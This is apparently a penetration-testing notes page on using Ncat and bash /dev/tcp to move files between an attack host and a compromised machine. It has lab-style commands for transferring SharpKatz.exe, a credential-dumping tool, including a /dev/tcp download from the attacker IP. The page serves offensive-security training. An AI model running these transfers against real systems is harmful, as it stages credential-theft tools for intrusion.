Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Ncat File Transfer

Ncat is a modern reimplementation of Netcat produced by the Nmap Project. It supports SSL, IPv6, SOCKS and HTTP proxies, connection brokering, and more.

Note: Ncat is used in HackTheBox’s PwnBox as nc, ncat, and netcat.

File Transfer Methods

Method 1: Compromised Machine Listening

Compromised machine (listening):

ncat -l -p 8000 --recv-only > SharpKatz.exe

The --recv-only flag closes the connection once the file transfer is finished.

Attack host (sending):

ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

The --send-only flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted. Typically, Ncat would continue running until the network connection is closed, as the remote side may transmit additional data. However, with --send-only, there is no need to anticipate further incoming information.

Method 2: Attack Host Listening

Attack host (listening):

sudo ncat -l -p 443 --send-only < SharpKatz.exe

Compromised machine (receiving):

ncat 192.168.49.128 443 --recv-only > SharpKatz.exe

Method 3: Using Bash /dev/tcp (No Ncat Required)

Attack host (listening):

sudo ncat -l -p 443 --send-only < SharpKatz.exe

Compromised machine (receiving via /dev/tcp):

cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe

Common Options

  • -l: Listen mode
  • -p <port>: Specify port number
  • --send-only: Close connection once input is exhausted (sending side)
  • --recv-only: Close connection once file transfer is finished (receiving side)